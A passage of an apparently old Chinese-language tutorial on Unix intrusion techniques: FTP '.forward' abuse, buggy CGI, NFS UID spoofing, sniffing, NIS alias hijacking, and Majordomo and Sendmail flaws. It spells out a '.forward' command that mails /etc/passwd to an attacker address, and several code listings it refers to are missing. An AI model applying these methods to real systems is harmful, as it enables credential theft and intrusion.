如果匿名FTP主目錄可寫，可以寫一個".forward"文件;文件內容是一行用雙引號引起來的Shell命令;".forward"文件是用于郵件轉發的。如果某一用戶(此處為FTP)的主目錄下有這個文件時，那么，當該用戶收到郵件時，就要視".forward"的內容進行轉發:如果".forward"的內容為一些電子郵件地址，該郵件就被轉發到這些地址;而如果為一行用雙引號引起來的Shell命令，則該郵件的內容被重定向到此命令。此處，命令為:"|/bin/cat/etc/passwd|sed's/^//'|/bin/mail me@my.e-mail.addr"，實際上對重定向過來的作為輸入的郵件內容沒有做任何處理，而是把/etc/passwd(為了防止被安全機制過濾，先在每一行行首增加一個空格)發到了攻擊者的電子郵件地址(me@my.e-mail.addr)。因此。在有這樣一個".forward"文件后，再隨便發一封電子郵件給victim.cor上的FTP用戶，通過這種"轉發"功能，victim.com上的/etc/passwd文件就寄到攻擊者的電子郵件地址上來了。

WWW攻擊

很多WWW服務器都有預裝的CGI程序，其中有些程序由于設計上的失誤，使得攻擊者可以利用它們來做一些設計者意想不到的事情，如隨意執行服務器主機上的任何命令。下面是幾個著名的Buggy CGI:

這幾種方法都可以得到目標主機上的/etc/passwd(當然,前提都是該機提供WWW服務并且cgi-bin下放有這幾種Buggy(CGI)。

NFS攻擊

如果某用戶的主目錄共享出來，嘗試如下操作:

walt的UID為10101，于是在本地創建一個名為“walt”,UID為“10101”的用戶，用su命令在本地成為這個用戶(攻擊者在本地應該是

冒充用戶walt在安裝過來的sun8.com的/users/walt下 (即walt在sun8.com上的主目錄下)放一個".forward"文件，再發一封電子郵件給該用戶，根據上面已經講過的道理，郵件轉發機制就會把sun8.com的/etc/passwd文件郵寄給攻擊者了。

Sniffer攻擊

由于大多數網絡數據流是明文傳輸的，所以在廣播性質的以太網內。任何一臺主機都可以竊聽到其他主機間的任何通信包，包括用于網絡登錄用戶認證的口令。獲得用戶口令后,自然可以冒充該用戶登錄到攻擊目標上去。Sniffer的局限是:攻擊者和被攻擊者必須在同一個以太局域網內，這通常不僅意味著物理上的鄰近，而且意味著組織和部門上的鄰近，即一般攻擊者為內部人員。

NIS攻擊

NIS(Network Information System:網絡信息系統)用于網絡管理信息的共享和統一管理。一般情況下，諸如Passwd、hosts、networks、alias等系統配置信息都是分散在各臺主機上，各不相干。但實際上這些信息在同一個子網內往往是公共的，NIS即是為這些信息提供一個統一的存放地點(NIS服務器)，這樣不僅可以避免重復，還容易保持這些信息的一致性。NIS又稱Yellow Page，故其命令都以yp-開頭;后來又有新的NIS+，其命令改成以nis-開頭。

這類攻擊會先猜測域名，然后用ypcat(或對于NIS+:niscat)可獲得passwd(甚至shadow)頂用NIS后，用戶口令信息從NIS服務器上獲取。若能控制NIS服務器，就可以創建郵件別名。

假設攻擊者控制了NIS服務器，在該服務器上建立一個名叫"foo"的別名，則這個別名為該NIS域內所有的主機共享，其中包括攻擊目標victim.com，所以當攻擊者發一封信到foo@victim.com時，victim.com就從NIS服務器取得別名"foo"的定義，即:把victim.com上的/etc/passwd文件發送到攻擊者的電子郵件地址。

E-mail攻擊

電子郵件看上去好像是一種最無害的網絡服務，但在黑客看來，每個開向網絡的窗口都可能成為通向系統的大門。以下是一個利用majordomo(ver.1.94.3)漏洞的例子。

Majordomo是一種電子郵寄列表(Mailing list)服務器，所謂Mailing list是服務器維護著的一張電子郵件地址的表，服務器負責把所有發向該列表的信件轉發到列表中的每個電子郵件地址。這樣就可以形成一個虛擬的公共場所。在其中，每個人的聲音都可以被所有其他的人聽到。Majordomo被全世界眾多的Mailing list廣泛使用，其特定版本V.1.94.3中有一個漏洞，黑客可以利用這個漏洞在目標機上運行任何Shell腳本，方法是把這個腳本放在自己的Home目錄下，并保證本地機允許目標機用RCP拷貝這個腳本，然后向該郵件列表發一封電子郵件，在Reply-to域中鍵入上列的字符串。

如果腳本內容如上所示，則該Majornomo程序將會把目標上的/etc/passwd寄給攻擊者。

Sendmail攻擊

利用Sendmail 5.55的漏洞攻擊如下:

效果類似，會得到victim.com的passwd文件。再接著利用/etc/aliases,pag。aliases.pag是/etc/aliases編譯后的形態。在許多系統中這個文件是對所有人可寫的(World-writable)。

本地的uuencode程序生成一個編碼流，文件名為'etc/aliases.pag"，內容與本地decode相同，并作為電子郵件發給victim.com上的decode別名，victim.com收到該郵件后，把這個編碼流重定向到解碼程序uudecode,uudecode則恢復文件內容。并試圖把它存為/etc/aliases.pag;如果daemon對/etc/aliases.pag有寫權限，則改寫成功，于是victim.com上獻出現一個別名"bin"——它所做的正是發送攻擊者需要的passwd文件到其電子郵箱。